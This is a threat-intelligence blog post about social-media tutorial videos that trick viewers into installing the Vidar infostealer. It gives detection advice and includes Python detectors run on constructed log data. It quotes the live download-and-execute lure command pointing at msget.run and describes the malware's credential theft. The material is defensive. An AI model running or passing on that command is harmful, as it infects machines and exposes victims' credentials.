Scammers have found a way to distribute infostealer malware without sending a single phishing email. They film a tutorial video, post it to TikTok or Instagram Reels, wait for the algorithm to do the rest, and collect stolen credentials from thousands of infected machines. ReversingLabs researchers recently uncovered two distinct campaigns doing exactly this, both delivering Vidar infostealer through fake software installation guides dressed up to look like legitimate help content. If your organisation runs any kind of BYOD policy, or if your employees access corporate SaaS tools from personal devices, this is a threat you need to understand now.
The mechanics are straightforward, which is precisely what makes them effective. An attacker creates a social media account, produces what looks like a genuinely helpful software tutorial, and instructs viewers to run a PowerShell command to get the software they want. The victim types the command, the malware downloads silently, and the attacker receives a log file containing everything stored in that person's browser within minutes. No malicious attachment, no suspicious link in an email, no warning from a spam filter. Just a video that looked helpful.
The first campaign identified by ReversingLabs centres on fake software installation tutorials. These are not rough-cut screen recordings thrown together overnight. The videos feature polished graphics and voiceovers, production quality high enough to pass a casual inspection as legitimate tech-help content. That level of finish matters enormously on platforms like TikTok and Instagram, where visual credibility and confident delivery are enough to establish perceived authority with a large audience.
The second campaign takes a different approach to audience-building. Rather than relying on a single video, attackers pushed streams of short videos promising free access to paid software: Spotify Premium, Microsoft Word, and similar titles that people genuinely want but would rather not pay for. Each of these short clips serves as a funnel, directing viewers toward a central tutorial video that contains the actual download instructions. It is a content marketing strategy applied to malware distribution, and it works because the promise of free premium software has obvious and enduring appeal.
What both campaigns exploit is trust in format. People have learned to be wary of email attachments and suspicious links, but a slickly produced video on a mainstream social platform triggers very different cognitive responses. The medium itself conveys legitimacy. When someone in your finance team searches for how to activate a piece of software and finds a confident, well-produced tutorial with tens of thousands of views and thousands of likes, their guard is substantially lower than it would be in their inbox.
The technical delivery mechanism is elegant in its simplicity. As reported by Help Net Security, the tutorial instructs the viewer to open PowerShell and enter the command iex irm followed by an address such as msget.run/spotify. That two-word prefix, iex irm, is doing the heavy lifting. irm is an alias for PowerShell's Invoke-RestMethod cmdlet, which fetches content from a remote URL. iex is Invoke-Expression, which executes whatever that fetched content contains. Chained together, they form a classic one-liner that downloads a remote script and runs it immediately, with no intermediary file written to disk at that stage.
What actually gets downloaded is a file named build.exe, which carries the Vidar infostealer payload. The victim sees a brief command prompt flash and, if the fake software tutorial has been designed carefully enough, may even see a convincing fake installation screen before anything feels wrong. By that point, Vidar has already begun its collection routine. The whole chain, from running the command to initial data exfiltration, can complete in under a minute on a standard machine.
The reason this technique is so dangerous in enterprise contexts is that iex irm one-liners are also used in legitimate administrative scripts. System administrators run similar commands routinely. Blocking PowerShell access entirely is not feasible in most environments, and detecting malicious use requires behavioural monitoring rather than simple keyword filtering. As noted by HackRead, the technique bypasses traditional email security filters entirely because no email is involved at any point in the chain.
The shift toward social media as a malware delivery vector is not accidental. Email security has matured substantially over the past decade. Sandboxing, link rewriting, attachment detonation, and AI-driven phishing detection have made email-based delivery increasingly expensive for attackers. Social media platforms, by contrast, have none of that infrastructure applied to content at scale. A video is a video. The platform's content moderation is built primarily to catch hate speech, misinformation, and copyright violations, not malware delivery instructions embedded in a voiceover.
From an attacker's perspective, social media also offers something email never could: organic reach driven by an algorithm. Post a video that gets early engagement, and the platform will actively distribute it to hundreds of thousands of additional viewers at zero additional cost. That is a distribution capability that would have required a substantial botnet or spam infrastructure to replicate via email. Understanding how these channels now form part of your organisation's external attack surface is increasingly important for security teams who have historically focused their monitoring on traditional threat vectors.
The scale these campaigns can achieve is not theoretical. According to Help Net Security, a single tutorial video in these campaigns accumulated more than 100,000 views and generated thousands of saves, shares, and likes. Think about what that means in terms of infection surface. Even a conservative conversion rate of half a percent (viewers who actually followed the instructions) would represent hundreds of infected machines from a single piece of content. And because shares extend reach beyond the original audience, many of those viewers will have encountered the video not by searching for pirated software but because someone they trusted shared it.
The saves metric is particularly telling. People saving a video to watch later is a signal of genuine intent to follow the instructions, not just passive consumption. A video with thousands of saves is, in effect, a delayed-deployment malware campaign: those saved copies sit in personal feeds waiting to be acted upon, sometimes days or weeks after the initial post. Even if the account is eventually taken down, saved versions persist in viewers' collections.
Perhaps the most alarming detail in the ReversingLabs research is what happened when the threat was reported. Researchers flagged the scam accounts directly to Instagram. The platform rejected those alerts. The accounts remained active. This is not a minor operational hiccup; it reflects a structural problem with how large platforms assess abuse reports that don't fit neatly into their existing violation categories. A video teaching someone to run a PowerShell command does not, on its face, violate community guidelines about violence or harassment. Without malware analysis capabilities embedded in the moderation pipeline, platforms are largely blind to this category of abuse.
For security teams, this has a practical implication: you cannot rely on platform takedowns as a meaningful control. By the time a campaign video is removed, if it is ever removed, it will have already reached its peak organic distribution. Your defensive posture needs to account for the fact that this content will remain available and active, and that your users will encounter it.
Vidar is not new, and it is not subtle. It is a mature, commercially distributed infostealer that has been in active use for several years. What it does, it does very efficiently, and the breadth of data it targets makes even a single infection on a personal device a serious corporate security event.
Once build.exe executes on a victim's machine, Vidar begins systematically extracting data from the browser and the local filesystem. As documented by Infosecurity Magazine, this includes saved passwords, browser cookies, banking data, and cryptocurrency wallet files. In practice, "browser cookies" means active session tokens for every authenticated web application the victim has open or recently accessed: their email, their company's SaaS tools, their banking portals, their cloud storage. A single cookie harvest from a developer's personal laptop could include authenticated sessions for AWS, GitHub, Slack, and a corporate VPN portal simultaneously.
The banking data component adds financial exposure on top of the corporate risk. Victims of these campaigns may find themselves dealing with personal account fraud while their employer's security team is simultaneously trying to contain a credential breach. These incidents compound each other in ways that make incident response significantly more complicated, particularly when the infected device is personal rather than corporate-managed.
Cryptocurrency wallet files are also targeted, a reminder that Vidar's authors built it to extract maximum value from each infection, not to serve a single purpose. The malware collects what it finds and sends it back; the operator then decides which data to use, sell, or trade.
Vidar operates as malware-as-a-service. According to Infosecurity Magazine, a lifetime licence is available on criminal forums for $300. That price point is significant. It means the barrier to entry for running a Vidar campaign is low enough that it's accessible to moderately skilled threat actors with limited resources, not just sophisticated organised crime groups. Anyone willing to spend $300 and invest a few hours producing a convincing tutorial video can operate a campaign of this kind.
The MaaS model also means that the people running these social media campaigns are not necessarily the same people who developed Vidar. They are customers. This creates a fragmented threat picture where attribution is difficult and the pool of potential operators is large. When you monitor dark web markets and Telegram channels for stolen credential logs (which is where Vidar's output typically ends up), you are not tracking a single group but potentially dozens of independent operators all using the same tool.
The honest answer to the question of who is at risk is: any organisation whose employees use personal devices for any work-related activity, or who access corporate systems from machines that are not fully managed. That describes the majority of enterprises in 2025, particularly in sectors like financial services, professional services, and government where hybrid working has become standard practice.
BYOD policies create a direct bridge between consumer-grade threat vectors and corporate infrastructure. An employee who installs Vidar on their personal laptop while trying to get free Spotify access has potentially handed an attacker their VPN credentials, their corporate SaaS session tokens, and their saved passwords for internal systems, all from a device that your endpoint detection tools have no visibility into whatsoever. Your MDM solution covers managed devices. It does nothing for the personal MacBook someone uses to check their work email on Sunday evenings.
The risk is not hypothetical. Infostealer logs harvested from personal devices have been a documented source of initial access for enterprise breaches for several years. The logs get sold on dark web markets, often within hours of infection, and initial access brokers purchase them specifically to identify corporate credentials embedded in the harvest. Your threat intelligence programme needs to account for this channel, not just traditional credential dumps from corporate system breaches.
The population most at risk within an enterprise is broader than you might initially assume. It is not only junior employees who might be tempted by free software. IT staff searching for utility tools, developers looking for shortcuts, finance team members trying to access productivity software: these are all plausible victims of a well-produced tutorial campaign. The social engineering is not targeting naivety; it is targeting the universal human desire to save money on software.
Session cookie theft deserves particular attention because it defeats MFA. When an attacker obtains a valid session cookie for an authenticated application, they do not need the victim's password or their one-time passcode. The session is already authenticated. They simply import the cookie into a browser, and the application treats them as the legitimate logged-in user. This is not a theoretical attack; it is the mechanism behind a growing proportion of business email compromise and SaaS account takeover incidents.
For organisations using SaaS tools for sensitive operations (contract management, financial approvals, HR systems, cloud infrastructure consoles), a single stolen session cookie can give an attacker sufficient access to cause significant damage before the victim or the security team notices anything is wrong. The attacker does not need to establish persistence, install additional tools, or escalate privileges. The stolen session gives them whatever access the legitimate user has, immediately. Understanding indicators of compromise associated with session hijacking (unusual access times, unfamiliar IP geolocation, unexpected actions in audit logs) is one of the few detection opportunities available after a cookie has been stolen from an unmanaged device.
Start with awareness, but do not stop there. Telling employees not to run PowerShell commands they found in a video is good hygiene advice, but it is insufficient as a control. You need to assume that some percentage of your workforce will, at some point, do exactly that on a personal device. Your controls need to account for that reality rather than simply hoping awareness training prevents all incidents.
On managed endpoints, enforce PowerShell execution policies that prevent unsigned scripts from running and log all PowerShell activity to your SIEM. Specifically, commands containing iex combined with irm or Invoke-Expression combined with Invoke-WebRequest or Invoke-RestMethod should generate immediate alerts. These combinations have very limited legitimate use cases in non-administrative contexts and are a reliable indicator of this category of attack.
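As an added example (not code from the article, ReversingLabs, or any vendor), a small Python detector for the iex/irm pattern the paragraph describes, run over constructed PowerShell script block log records: it expands the aliases to their cmdlet names, is indifferent to piping order, and decodes -EncodedCommand so the pattern is not hidden by encoding. The record shape, user names, and every URL other than msget.run/spotify are assumptions.

```python
import base64
import re

# PowerShell resolves these aliases to the full cmdlet names; lookups are
# case-insensitive because PowerShell itself is.
CANON = {
    "iex": "Invoke-Expression",
    "irm": "Invoke-RestMethod",
    "iwr": "Invoke-WebRequest",
    "invoke-expression": "Invoke-Expression",
    "invoke-restmethod": "Invoke-RestMethod",
    "invoke-webrequest": "Invoke-WebRequest",
}
FETCH = {"Invoke-RestMethod", "Invoke-WebRequest"}
EXEC = {"Invoke-Expression"}
# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload, if one is present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def cmdlets_used(cmdline):
    """Canonical names of the fetch/exec cmdlets invoked anywhere in the line."""
    tokens = re.findall(r"[A-Za-z][A-Za-z-]*", expand_encoded(cmdline))
    return {CANON[t.lower()] for t in tokens if t.lower() in CANON}


def is_download_cradle(cmdline):
    """True when a remote fetch and Invoke-Expression appear in one command."""
    used = cmdlets_used(cmdline)
    return bool(used & FETCH) and bool(used & EXEC)


def _enc(script):
    # Helper to build a constructed encoded sample; not part of the detector.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records in the shape of PowerShell script block logging
# (Event ID 4104); "script" is the field a SIEM rule would inspect.
SAMPLE_EVENTS = [
    {"id": 1, "user": "alice", "script": "iex irm msget.run/spotify"},
    {"id": 2, "user": "svc-monitor",
     "script": "Invoke-RestMethod -Uri https://intranet.example/health"},
    {"id": 3, "user": "bob",
     "script": "irm https://get.example/install.ps1 | iex"},
    {"id": 4, "user": "carol",
     "script": "powershell.exe -enc " + _enc("iex (irm http://cdn.example/x)")},
    {"id": 5, "user": "dave",
     "script": "Get-Content .\\build.ps1 | Invoke-Expression"},
]


def scan_events(events):
    """Return the ids of script block events matching the cradle pattern."""
    return [ev["id"] for ev in events if is_download_cradle(ev["script"])]
```

Event 2 (fetch only) and event 5 (local Invoke-Expression only) are deliberately not flagged, which is the distinction that keeps this rule from firing on ordinary administrative use.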
For BYOD environments, conditional access policies enforced through your identity provider are your primary control. Require re-authentication with fresh credentials at regular intervals and configure your SaaS applications to invalidate sessions that originate from IP addresses or device fingerprints inconsistent with the user's established patterns. This does not prevent cookie theft, but it limits the window in which a stolen cookie remains usable.
Dark web monitoring of infostealer log markets and Telegram channels where logs are traded is one of the highest-value controls available for this threat vector. Vidar logs are posted to these channels rapidly after infection. If you can identify credentials belonging to your organisation in a fresh log dump before an attacker has used them, you have a meaningful window to invalidate sessions, reset passwords, and investigate the source device. Without that monitoring capability, you may not discover the theft until an account takeover has already occurred.
Review your software policy and communicate it clearly. Employees should know where they are permitted to obtain software and what to do if they encounter a request to run command-line instructions as part of an installation process. That is not a normal software installation step, and it should be treated as an immediate red flag. Short, practical guidance distributed through internal channels is more effective than lengthy policy documents that nobody reads.
Finally, consider running tabletop exercises that include the scenario of an unmanaged personal device infection. Walk through what your team would actually do if an employee reported that they had run a suspicious command on their home laptop before accessing corporate systems. The answer to that question, and whether your team has it clearly mapped out, will tell you a great deal about your current preparedness for this threat.
The primary network-based indicator associated with these campaigns is outbound PowerShell connections to domains serving the build.exe payload. The specific domain cited in the research is msget.run, with the path /spotify used in one observed instance. Any DNS query or HTTP request to msget.run from an endpoint in your environment should be treated as a high-priority alert requiring immediate investigation of that machine.
The file build.exe, when identified on a host, is the payload itself. Hash-based detections will vary depending on the specific build delivered to a given victim (Vidar operators frequently repack or recompile payloads to evade static signature detection), so behavioural detection is more reliable than file hashing alone. Look for build.exe executing from a user's temporary directory or downloads folder following a PowerShell parent process. That process chain is a strong behavioural indicator regardless of the specific hash.
Post-infection, Vidar communicates with command-and-control infrastructure to exfiltrate collected data. Because the specific C2 addresses used by individual MaaS operators vary and change frequently, maintaining up-to-date threat intelligence feeds that track Vidar C2 infrastructure is more reliable than relying on static blocklists. Outbound connections from an endpoint to newly registered domains or domains with no prior traffic history from your network, particularly carrying large POST requests in a short window after a new executable runs, warrant immediate scrutiny.
On the host side, look for unexpected access to browser profile directories (specifically the Login Data, Cookies, and Web Data SQLite files within Chrome, Edge, or Firefox profile folders) by processes other than the browser itself. Vidar must read these files to extract credentials and cookies, and access by a non-browser process to these specific files is anomalous behaviour that endpoint detection tools configured for behavioural analysis should flag.
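The two host indicators described above (an executable launched from a staging directory with a PowerShell parent, and a non-browser process reading browser credential stores) expressed as Python rules over constructed Sysmon/EDR-style events. This is an added example, not the article's or any vendor's detection content; the paths, process names, and the Firefox file names (cookies.sqlite, logins.json, key4.db) are assumptions added here.

```python
import ntpath

PS_HOSTS = {"powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Chromium credential stores named in the article, plus the Firefox
# equivalents as an added assumption.
CRED_FILES = {"login data", "cookies", "web data",
              "cookies.sqlite", "logins.json", "key4.db"}
STAGING = ("\\appdata\\local\\temp\\", "\\downloads\\")

# Constructed telemetry: process-creation and file-read events in a
# Sysmon/EDR-like shape. Nothing here is captured from a real host.
EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Users\alice\Downloads\build.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 2, "type": "process", "image": r"C:\Users\alice\Downloads\setup.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 3, "type": "file_read", "image": r"C:\Users\alice\Downloads\build.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"id": 4, "type": "file_read",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"id": 5, "type": "file_read", "image": r"C:\Users\alice\AppData\Local\Temp\build.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default\cookies.sqlite"},
]


def _base(path):
    # Lower-cased file name of a Windows path, regardless of the host OS.
    return ntpath.basename(path).lower()


def suspicious_process_chain(ev):
    """Executable in Temp/Downloads launched by a PowerShell host process."""
    image = ev["image"].lower()
    return (_base(ev["parent"]) in PS_HOSTS
            and image.endswith(".exe")
            and any(d in image for d in STAGING))


def suspicious_profile_access(ev):
    """Non-browser process reading a browser credential or cookie store."""
    target = ev["target"].lower()
    in_profile = "\\user data\\" in target or "\\firefox\\profiles\\" in target
    return (_base(ev["image"]) not in BROWSERS
            and in_profile
            and _base(target) in CRED_FILES)


def triage(events):
    """Return (event id, reason) for every event matching one of the rules."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and suspicious_process_chain(ev):
            findings.append((ev["id"], "powershell-spawned exe from staging dir"))
        elif ev["type"] == "file_read" and suspicious_profile_access(ev):
            findings.append((ev["id"], "non-browser read of browser credential store"))
    return findings
```

Neither rule keys on the file name build.exe or on a hash, so a repacked payload under another name still matches as long as the behaviour is the same.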
Email security infrastructure has become sophisticated enough to catch the majority of traditional phishing attempts before they reach an inbox. Sandboxing, link analysis, and sender reputation scoring create real friction for email-based campaigns. Social media video platforms have none of that infrastructure applied to content at scale: a video is assessed for community guideline violations, not for whether its instructions would install malware on a viewer's machine. Beyond the defensive gap, social media offers algorithmic distribution that can deliver a malicious tutorial to over 100,000 viewers organically, without any additional infrastructure investment from the attacker. The format also generates trust that email cannot: a polished video with thousands of likes reads as credible in a way that an unsolicited email never does.
irm is PowerShell shorthand for Invoke-RestMethod, a built-in cmdlet that fetches content from a URL. iex is shorthand for Invoke-Expression, which executes a string as PowerShell code. When combined, iex irm https://domain/path fetches whatever content is served at that URL and immediately executes it as code, without saving a script file to disk first. In the campaigns documented by ReversingLabs, this chain results in the download and execution of build.exe containing the Vidar payload. The technique is commonly called a "fileless" initial stage because the intermediary script never persists on disk, though the final executable does write itself to the filesystem.
Not directly. Corporate endpoint detection and response tools, mobile device management platforms, and antivirus solutions only operate on devices enrolled in your management environment. A personal laptop or phone that is not enrolled is entirely outside the visibility of those tools. The practical implication is that if an employee infects a personal device and then accesses corporate systems using credentials or session cookies stored on that device, the theft may go undetected until the stolen credentials appear in dark web markets or an account takeover occurs. This is why dark web monitoring and identity-threat detection on the authentication layer (rather than on the endpoint) are the most reliable compensating controls for BYOD environments.
Vidar does require outbound network connectivity to exfiltrate its collected data. Once the malware completes its harvesting routine (extracting passwords, cookies, banking data, and wallet files), it packages that data and sends it to command-and-control infrastructure operated by the MaaS customer running the campaign. This communication is typically over HTTP or HTTPS to attacker-controlled domains. Historically, some Vidar variants have also used legitimate platforms such as Telegram channels as dead-drop points for C2 configuration data, making the initial C2 lookup harder to distinguish from normal traffic. The exfiltration itself, however, involves a direct connection to attacker infrastructure, which is why outbound traffic monitoring and DNS logging remain relevant detection points even for infections originating on unmanaged devices that temporarily connect to your network.
The source material from ReversingLabs and the secondary reporting does not identify specific geographic or industry targeting in these campaigns. The delivery mechanism (publicly accessible social media content designed to attract anyone searching for free premium software) is inherently broad rather than targeted. Spotify Premium and Microsoft Word are used globally across every industry vertical, which suggests the campaigns are designed for maximum reach rather than precision targeting. That said, the downstream value of stolen credentials varies by victim profile, and infostealer log buyers on underground markets frequently filter purchased logs for specific corporate domains, job titles, or access to particular SaaS platforms. The initial infection may be indiscriminate, but the monetisation of the resulting logs can be highly targeted.
Attacks like this one rarely announce themselves through official channels first. New payloads, active infrastructure, and exploitation techniques circulate in closed forums and private channels well before any public research surfaces them. By the time an incident makes it into a threat report, organisations without early visibility are already behind.
Defendis gives your security team that early visibility. We monitor the dark web, underground forums, and threat actor channels so your team receives relevant intelligence before it becomes breaking news: context about emerging threats, matched against your organisation's exposure, without requiring your analysts to spend time in places they should not have to go.